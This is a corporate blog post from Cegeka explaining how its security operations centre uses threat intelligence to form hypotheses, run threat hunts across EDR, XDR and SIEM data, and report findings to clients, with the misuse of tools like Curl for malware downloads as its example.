Cegeka_Logo Careers Language Solutions Back
Solutions
Hybrid Cloud

Hybrid Cloud

Explore the added value of cloud adoption for your business.

Data solution

Data & AI

Discover our different data solutions to help you become a data-driven company.

RegulatoryCompliance_Visuals_Navigation (1)

Regulatory Compliance

Ensure GDPR & GxP compliance with our comprehensive solutions.

Cyber Security & Networking Solution

Cyber Security & Networking

With cyber resilience, your organisation becomes a bit more secure with each day.

Digital Workplace Solution

Digital Workplace

Hybrid workplaces that increases productivity and reduces costs.

Testing_Visuals_IconNavigation (1)

Quality Engineering

Ensuring seamless software, one Test at a time.

Cegeka Application Services

Cegeka Application Services

Building the applications to embed growth, innovation and agility.

Business Applications

Business Applications

Transform your business with Microsoft Dynamics ERP and CRM, integrated with Microsoft’s Power Platform.

5G_Citymesh

5G & Mobile Private Networks

Expertise and development experience to bring all the advantages of 5G.

Products and platform solutions

Products & Platforms

Software solutions that optimize business processes and drive success.

Services Back
Services
Website_Navigation_IT_Team_Extension_3

IT Team Extension

The best IT professionals to support your projects.

Outsourcing Services

Outsourcing & Managed Services

Outsourcing your IT helps you to focus on your strategy.

Website_Navigation_Consultancy

Consultancy

The right skills and attitude to support the IT projects at your office

Website_Navigation_Projects

Projects

Integrating the right digital solutions for your IT project

Industries Back
Industries

Our industry-tailored services are designed to address specific challenges and opportunities across different industries.

All industries
Website_Navigation_Agriculture

Agriculture

Cegeka has a deep understanding of the agri and food ecosystem and the opportunities it creates.

food-80-80

Food

Streamline operations, ensure traceability and maintain compliance.

Energy & Utilities

Energy & Utilities

The arrival of smart electricity grids will allow companies to take care of their own energy management

pharma-icon-80-80

Pharma & Life Sciences

Face the increasingly complex challenges in Pharma & life sciences with confidence.

Manufacturing

Manufacturing

Production chains are becoming intelligent networks with real-time track-and-trace systems.

Website_Navigation_Mobility

Mobility

Offer citizens, businesses and visitors a better experience by integrating the best digital solutions for mobility.

Insights Back
Knowledge is our backbone

We believe in sharing our insights and expertise with you. Explore our resources and learn more about our products, services and industry trends.

Icons_Navigation_Case Studies

Case Studies

Step into the world of our delighted customers and see how we helped them achieve their goals.

Icons_Navigation_News Items

Corporate News

Stay in the loop with our company news, announcements, awards and events.

Icons_Navigation_Blogs

Blogs

Read our latest articles on topics ranging from technology, innovation, business and beyond.

Icons_Navigation_Webinars

Webinars

Be part of the action with our live or on-demand webinars, where our experts share invaluable knowledge.

Icons_Navigation_Ebooks

E-books & Whitepapers

Download our guides and reports on various aspects of technology and business.

Icons_Navigation_Events

Events

Find out where we are going to be next, and register for our upcoming events.

CTG Academy

Academy

Enhance your skills with our expert-led training courses, tutorials, and certifications at our Academy.

Join our Academy
About us Back
shaping digital together

We work shoulder to shoulder with our clients to ensure technology drives impact when and where it matters most.

Start the journey with us
Icons_Navigation_Why Cegeka

Why Cegeka

Discover why more than 2,500 clients around the world choose to work with us, and stay with us.

Icons_Navigation_Cegeka&Society

ESG at Cegeka

We turn ESG ambition into action via sustainable IT, carbon footprint reduction and an inclusive work environment.

Icons_Navigation_Our Story

The Cegeka Story

In just over 30 years, Cegeka has grown from 30 people to a global company with 9,000 employees across 3 continents.

Icons_Navigation_Annual Report

Annual Report

See how our work makes a difference, explore the full annual report to learn more.

More Cegeka

Our Management

Corporate News

Contact & Locations

Back
Select language

Global   (EN)

Austria   (DE)

Belgium   (NL)

Belgium   (FR)

Denmark   (EN)

Germany   (DE)

Italy   (IT)

Romania   (EN)

Sweden   (EN)

The Netherlands   (NL)

United Kingdom   (EN)

United States   (EN)

Let’s get in touch
Cegeka_Logo Solutions
Solutions
Hybrid Cloud

Hybrid Cloud

Explore the added value of cloud adoption for your business.

Data solution

Data & AI

Discover our different data solutions to help you become a data-driven company.

RegulatoryCompliance_Visuals_Navigation (1)

Regulatory Compliance

Ensure GDPR & GxP compliance with our comprehensive solutions.

Cyber Security & Networking Solution

Cyber Security & Networking

With cyber resilience, your organisation becomes a bit more secure with each day.

Digital Workplace Solution

Digital Workplace

Hybrid workplaces that increases productivity and reduces costs.

Testing_Visuals_IconNavigation (1)

Quality Engineering

Ensuring seamless software, one Test at a time.

Cegeka Application Services

Cegeka Application Services

Building the applications to embed growth, innovation and agility.

Business Applications

Business Applications

Transform your business with Microsoft Dynamics ERP and CRM, integrated with Microsoft’s Power Platform.

5G_Citymesh

5G & Mobile Private Networks

Expertise and development experience to bring all the advantages of 5G.

Products and platform solutions

Products & Platforms

Software solutions that optimize business processes and drive success.

Services
Services
Website_Navigation_IT_Team_Extension_3

IT Team Extension

The best IT professionals to support your projects.

Outsourcing Services

Outsourcing & Managed Services

Outsourcing your IT helps you to focus on your strategy.

Website_Navigation_Consultancy

Consultancy

The right skills and attitude to support the IT projects at your office

Website_Navigation_Projects

Projects

Integrating the right digital solutions for your IT project

Industries
Industries

Our industry-tailored services are designed to address specific challenges and opportunities across different industries.

All industries
Website_Navigation_Agriculture

Agriculture

Cegeka has a deep understanding of the agri and food ecosystem and the opportunities it creates.

food-80-80

Food

Streamline operations, ensure traceability and maintain compliance.

Energy & Utilities

Energy & Utilities

The arrival of smart electricity grids will allow companies to take care of their own energy management

pharma-icon-80-80

Pharma & Life Sciences

Face the increasingly complex challenges in Pharma & life sciences with confidence.

Manufacturing

Manufacturing

Production chains are becoming intelligent networks with real-time track-and-trace systems.

Website_Navigation_Mobility

Mobility

Offer citizens, businesses and visitors a better experience by integrating the best digital solutions for mobility.

Insights
Knowledge is our backbone

We believe in sharing our insights and expertise with you. Explore our resources and learn more about our products, services and industry trends.

Icons_Navigation_Case Studies

Case Studies

Step into the world of our delighted customers and see how we helped them achieve their goals.

Icons_Navigation_News Items

Corporate News

Stay in the loop with our company news, announcements, awards and events.

Icons_Navigation_Blogs

Blogs

Read our latest articles on topics ranging from technology, innovation, business and beyond.

Icons_Navigation_Webinars

Webinars

Be part of the action with our live or on-demand webinars, where our experts share invaluable knowledge.

Icons_Navigation_Ebooks

E-books & Whitepapers

Download our guides and reports on various aspects of technology and business.

Icons_Navigation_Events

Events

Find out where we are going to be next, and register for our upcoming events.

CTG Academy

Academy

Enhance your skills with our expert-led training courses, tutorials, and certifications at our Academy.

Join our Academy
About us
shaping digital together

We work shoulder to shoulder with our clients to ensure technology drives impact when and where it matters most.

Start the journey with us
Icons_Navigation_Why Cegeka

Why Cegeka

Discover why more than 2,500 clients around the world choose to work with us, and stay with us.

Icons_Navigation_Cegeka&Society

ESG at Cegeka

We turn ESG ambition into action via sustainable IT, carbon footprint reduction and an inclusive work environment.

Icons_Navigation_Our Story

The Cegeka Story

In just over 30 years, Cegeka has grown from 30 people to a global company with 9,000 employees across 3 continents.

Icons_Navigation_Annual Report

Annual Report

See how our work makes a difference, explore the full annual report to learn more.

More Cegeka

Our Management

Corporate News

Contact & Locations

Global   Global EN Austria   Austria DE Belgium   Belgium NL Belgium   Belgium FR Denmark   Denmark EN Germany   Germany DE Italy   Italy IT Romania   Romania EN Sweden   Sweden EN The Netherlands   The Netherlands NL United Kingdom   United Kingdom EN United States   United States EN Careers Let’s get in touch
Home Discover our latest blogs Discover our latest blogs How threat hunting reduces business risks by uncovering hidden attacks
Cyber security & Networking
3 minutes reading

How threat hunting reduces business risks by uncovering hidden attacks

In a modern SOC, threat hunting is not just a nice to have, it is a cornerstone of resilience. By digging into data sources on a recurring basis, hidden attacks come to light faster, incident response becomes sharper, and overall risk is reduced. It is about moving from reacting to threats to actively staying ahead of them.

Raphaël Lheureux

Raphaël Lheureux

October 08, 2025

In a previous article, we covered threat intelligence: the collection and analysis of data to understand the threat actors that pose cybersecurity risks to your organization. On an operational level, this involves detecting threats by matching Indicators of Compromise (IoCs) and Tactics, Techniques, and Procedures (TTPs) with data sourced from SIEM (Security Information and Event Management) platforms and XDR products.

Configuring a fully automated system that strikes a fine balance between detection rate and false positives is a formidable challenge. For instance, it’s well known that certain malware is downloaded and installed on workstations using trusted, pre-installed system tools to spread malware (so-called LOLBins or Living Off The Land Binaries), like Curl or Certutil. However, given that these tools have many legitimate uses, such as in update mechanisms, detecting all downloads with these tools and flagging them for scrutiny by our SOC analysts would overload them with false positives. 

That’s why, on a tactical level, the Cegeka Modern SOC also performs recurring threat hunting. A senior CSIRT analysts then manually examines relevant, advanced and/or novel TTPs to uncover hidden attacks. So, how does this process work at Cegeka?

From threat intelligence to hands-on hunting 

Our CSIRT analysts closely follow cybersecurity trends and understand their clients’ risk profiles, including the relevant threat actors they may face. Threat modeling, the process of identifying potential attackers, their goals, and the techniques they might use to compromise systems, helps analysts prioritize which threats to focus on. For example, an analyst might notice a trend involving the use of LOLBins like Curl to download malware, or the rise of Eastern European ransomware groups. This modeling informs the hypotheses they explore during threat hunting. 

Drawing on this threat intelligence, the CSIRT analyst formulates several hypotheses, such as “Eastern European ransomware groups may be downloading attacker tools onto compromised machines using LOLBins.” This hypothesis is then translated into specific threat hunts, such as “The use of Curl for downloading from servers without a fully qualified domain name.” 

Each hunt is then converted into precise hunting queries for EDR (Endpoint Detection and Response), XDR (Extended Detection and Response), and SIEM (Security Information and Event Management) products. These queries are executed across the systems of all our clients. We also run queries on network monitoring tools, for instance, in relation to data transfers to servers without a fully qualified domain name. 

What threat hunting reveals  

Every hunt leads to one of three scenarios: we uncover something suspicious, we lack sufficient data, or we find no noteworthy results. 

  • Suspicious findings 
    We identify something suspicious that indicates a security incident. Of course, we address this issue with urgency.
  • Missing data 
    We are unable to execute a hunting query due to the absence of a specific data source, such as network data, on the client’s end. We inform the client that we couldn’t perform our threat hunt and kindly ask them to implement the necessary data source if they want to benefit from these threat hunts in the future. 
  • No findings 
    Upon completing our hunting query across all required data sources, nothing suspicious is found. This scenario (luckily) accounts for the majority of cases. 

Turning threat hunting results into actionable insights 

The results of our hunts provide insights that we compile into a report for our clients: 

  • Context of the hunt 
    We explain what was hunted and the rationale behind it: the threat intelligence that informed our hypothesis and the precise threat hunts it was translated into. For example, we might explain that our client’s profile is frequently targeted by ransomware groups using LOLBins for malicious tool transfers, hence our focus on these specific TTPs. 
  • Information about the hunt 
    We provide comprehensive details regarding the hunt, including the TTPs we queried for (referenced by their MITRE ATT&CK Technique ID). Any detected vulnerabilities are accompanied by their CVE (Common Vulnerabilities and Exposures) identifiers for additional reference. 
  • Results of the hunt 
    We outline the hunt’s findings for each technology we used (EDR, XDR, SIEM). 

Our SOC clients can also access these insights via the Cegeka Security Observability dashboard. This allows them to assess their risks and make informed decisions to improve their security posture based on concrete data from our threat hunts. For example, if our reports indicate they lack certain data sources, they may choose to invest in deploying these data sources to get the full benefit of our threat hunts. 

Reducing business risks through threat hunting 

By actively performing threat hunting and combining it with threat intelligence, newsletters, and ongoing threat research, organizations gain the insights needed to uncover hidden attacks and respond effectively to the latest cyber threats. It is this proactive approach that helps stay one step ahead in an ever-evolving threat landscape. 

Threat Hunting is a part of our Cegeka Modern SOC services by default. On one hand, it allows us to detect advanced techniques for which continuous monitoring rules would overload SOC analysts with false-positives, and on the other hand it truly is a compensating control for attacks that might have slipped through the mazes of the net, because they are so novel or advanced. 

Raphaël Lheureux

Raphaël Lheureux

More of Raphaël Lheureux articles

Get in touch